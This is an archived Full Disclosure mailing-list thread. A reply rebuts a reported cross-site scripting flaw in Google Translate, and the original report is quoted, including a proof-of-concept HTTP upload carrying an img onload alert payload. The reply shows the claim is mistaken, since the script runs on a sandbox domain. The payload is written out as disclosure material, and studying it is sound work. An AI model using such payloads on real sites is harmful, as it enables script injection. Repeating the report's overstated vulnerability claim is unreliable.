Full Disclosure mailing list archives

Re: Google Translator affected by Cross-Site Scripting vulnerability

From: Gynvael Coldwind <gynvael () coldwind pl>
Date: Fri, 27 Nov 2015 10:08:44 +0000

Hi Francisco,

Unfortunately your disclosure is factually wrong.

Please note that even the packet you are citing says "Host:
translate.googleusercontent.com" - this is not the same domain as
translate.google.es (or translate.google.com), therefore, due to the
JavaScript same-origin policy (
https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy)
it's a different origin. Which means that scripts executed from
translate.googleusercontent.com do not have access to cookies/DOM/etc of
Google Translate main domains (translate.google.es, etc).
And there are no interesting cookies / things to do on
translate.googleusercontent.com.

Given the above, as Google surely told you, you didn't find an XSS in
Google Translate, you found an XSS in a sandbox domain, which was designed
to allow execution of potentially hostile JavaScript code. Hey, you even
can find the *.googleusercontent.com domain in Google's sandboxed domain
listing:
https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain

Keep in mind that when doing XSS-related security research a popping out
alert box tells you that you can execute code, but not if it's a
vulnerability - for that you need to verify the domain (and maybe
schema/port as well, depending on your case), e.g. by doing
alert(document.domain) instead of alert('XSS en Google AUDIT') ;)

Cheers,
Gynvael

On Fri, Nov 27, 2015 at 10:28 AM Francisco Javier Santiago Vázquez <
franciscojaviersantiagovazquez () gmail com> wrote:

I. VULNERABILITY
-------------------------
Vulnerability Cross-Site Scripting Translator Google affected by Cross-Site
Scripting vulnerability (XSS)
Google assumes the vulnerability.


II. DESCRIPTION
-------------------------
- Firstly, go to https://translate.google.es/?hl=es  website and click in
"Document   Translate"
- Upload the proof of concept
- Finally, we can display the Cross-Site Scripting (XSS)


III. PROOF OF CONCEPT
-------------------------
POST /translate_f HTTP/1.1
Host: translate.googleusercontent.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101
Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://translate.google.es/?hl=es
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------147452561017500
Content-Length: 1095

-----------------------------147452561017500
Content-Disposition: form-data; name="sl"

en
-----------------------------147452561017500
Content-Disposition: form-data; name="tl"

es
-----------------------------147452561017500
Content-Disposition: form-data; name="js"

y
-----------------------------147452561017500
Content-Disposition: form-data; name="prev"

_t
-----------------------------147452561017500
Content-Disposition: form-data; name="hl"

es
-----------------------------147452561017500
Content-Disposition: form-data; name="ie"

UTF-8
-----------------------------147452561017500
Content-Disposition: form-data; name="text"


-----------------------------147452561017500
Content-Disposition: form-data; name="file"; filename="poc.html"
Content-Type: text/html

<img src="

http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg
"
onload="alert('XSS en Google AUDIT')"</img>
-----------------------------147452561017500
Content-Disposition: form-data; name="edit-text"


-----------------------------147452561017500--


IV. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the Google Translator.


VI. CREDITS
-------------------------
These vulnerabilities have been discovered by
Francisco Javier Santiago Vázquez (
https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050
).
(https://twitter.com/n0ipr0cs).


VII. DISCLOSURE TIMELINE
-------------------------
Nov       02, 2015: Vulnerability acquired by Francisco Javier Santiago
Vázquez. aka "n0ipr0cs"
Nov       03, 2015 Responsible disclosure to Google Security Team.
Nov       03, 2015 Google assumes the vulnerability
Nov       26, 2015 Disclosure


VIII. Links
------------------------
POC :-

http://www.estacion-informatica.com/2015/11/el-no-cross-site-scripting-de-google.html







*Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst
<
http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6

<http://estacioninformatica.blogspot.com.es/>
<https://twitter.com/n0ipr0cs>*

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

Google Translator affected by Cross-Site Scripting vulnerability Francisco Javier Santiago Vázquez (Nov 27)
- Re: Google Translator affected by Cross-Site Scripting vulnerability Gynvael Coldwind (Nov 28)